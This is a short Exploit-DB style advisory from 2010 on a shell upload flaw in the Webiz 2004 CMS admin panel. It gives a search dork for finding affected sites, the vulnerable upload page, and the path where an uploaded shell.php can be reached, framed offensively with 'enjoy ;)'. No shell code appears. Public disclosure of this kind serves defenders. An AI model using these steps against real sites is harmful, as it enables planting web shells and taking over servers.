Webiz 2004 - Local File Upload

EDB-ID:

12797

CVE:

N/A




Platform:

PHP

Date:

2010-05-29


# Exploit Title: (Webiz) local SHELL Upload Vulnerability
# Date: 23-05-2010
# Author: kannibal615
# Software Link: N/A
# Version: 2004
# Tested on: PHP
# CVE : N/A
# Code : 


         @@    @@  @@@@@@     @@    @@    @@@@    @@@@@@@  @@  @@   @@@@@@@  @@@@@
         @@    @@  @@   @@    @@    @@   @@  @@   @@       @@ @@    @@       @@   @@
         @@    @@  @@ @@@     @@@@@@@@  @@    @@  @@       @@@@     @@@@@@   @@   @@
          @@  @@   @@ @@@     @@@@@@@@  @@@@@@@@  @@       @@ @@    @@@@@@   @@ @@
           @@@@    @@   @@    @@    @@  @@    @@  @@       @@  @@   @@       @@   @@
            @@     @@@@@@     @@    @@  @@    @@  @@@@@@@  @@   @@  @@@@@@@  @@    @@ dot NET

                                       KANNIBAL615
			
=========================================================================
       WEBIZ REMOTE SHELL UPLOAD VULNERABILITY
=========================================================================
                      BY
                 KANNIBAL615
=========================================================================

== Found By   : kannibal615
== website    : www.vbhacker.net/vb
== email      : zn[at]live[dot]de
==
== Thanks to  : THE PIRATOR
==            : Pc-InSeCt / emptyzero
==            : DAK / l3G3NDS / m0j4h3d
==            : V!Ru$_T4ckJ3n / __MiM0__ 
==            : ruqa / PrideArabs / DIESEL
==            : yassine_hell / mu$lim
==            : ALL VBHACKER MEMBERS
=========================================================================

                                 EXPLOIT
                        
=========================================================================
==  CMS     :  Web content Management Tool [ wmt ]
==  version :  2004
==  risk    :  hight
==  dork    :  Powered by Webiz
==  Rating  :  *****
==  
==  -------------------------------------------
==  *** YOU MUST HAVE A ADMINISTRATOR RIGHT ***
==  -------------------------------------------
==
==  BUG
==  ../wmt/siteadmin/videos.php
==
==
==
==  PHP file Upload
==  
==
==
==  upload your shell from here
==  http://[localhost]/wmt/siteadmin/videos.php >> shell.php
==
==
==
==  Get it
==  http://[localhost]/wmt/userfiles/Media/videos/shell.php
==
==
==
==  enjoy  ;)
==
==  kannibal615 Copyright 2010
==
==  www.vbhacker.net/vb
==========================================================================